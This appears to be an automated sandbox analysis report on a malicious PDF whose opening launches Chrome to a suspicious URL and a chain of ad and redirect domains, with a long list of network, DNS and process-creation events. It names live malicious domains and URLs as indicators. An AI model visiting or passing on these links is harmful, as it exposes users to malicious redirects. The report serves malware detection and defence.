Source: global trafficHTTP traffic detected: GET /_next/static/chunks/dc0be3deba0a9b89-1736072686539.5b2e1a67b76350ce.js HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/media/m_28.094ddc20.webp HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/media/m_20.62b047c4.webp HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficHTTP traffic detected: GET /_next/static/media/m_13.99d105c0.webp HTTP/1.1Host: wungoangeredsa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: bohlepropiedades.com
Source: global trafficDNS traffic detected: DNS query: imagizer.imageshack.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.umbrellaland.fit
Source: global trafficDNS traffic detected: DNS query: www.terrificstrands.digital
Source: global trafficDNS traffic detected: DNS query: azz.underbellymeet.asia
Source: global trafficDNS traffic detected: DNS query: juvuthoors.com
Source: global trafficDNS traffic detected: DNS query: wungoangeredsa.com
Source: global trafficDNS traffic detected: DNS query: my.rtmark.net
Source: global trafficDNS traffic detected: DNS query: browser.sentry-cdn.com
Source: global trafficDNS traffic detected: DNS query: cdntechone.com
Source: global trafficDNS traffic detected: DNS query: forspearowor.com
Source: global trafficDNS traffic detected: DNS query: datatechone.com
Source: global trafficDNS traffic detected: DNS query: datatechonert.com
Source: unknownHTTP traffic detected: POST /includes/sse.php HTTP/1.1Host: bohlepropiedades.comConnection: keep-aliveContent-Length: 28sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonContent-Type: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://bohlepropiedades.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://bohlepropiedades.com/includes/3z6r2I6C42020JAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.drString found in binary or memory: http://x1.i.lencr.org/
Source: chromecache_291.10.drString found in binary or memory: https://bohlepropiedades.com/
Source: chromecache_289.10.drString found in binary or memory: https://feed.chimukappa.com/e.php?m=
Source: chromecache_289.10.drString found in binary or memory: https://feed.chimukappa.com/feed.php?v=1731923398&ep=
Source: chromecache_291.10.drString found in binary or memory: https://www.umbrellaland.fit/?sl=5879905-0031c&pub_click_id=
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
Source: classification engineClassification label: mal56.winPDF@42/203@45/13
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6456Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-06 06-06-25-120.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\AZfDGVWF68.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1556,i,2814437525766773916,2514006706851234816,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1972,i,17501448836344422679,2360784714452452957,262144 /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1556,i,2814437525766773916,2514006706851234816,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1972,i,17501448836344422679,2360784714452452957,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
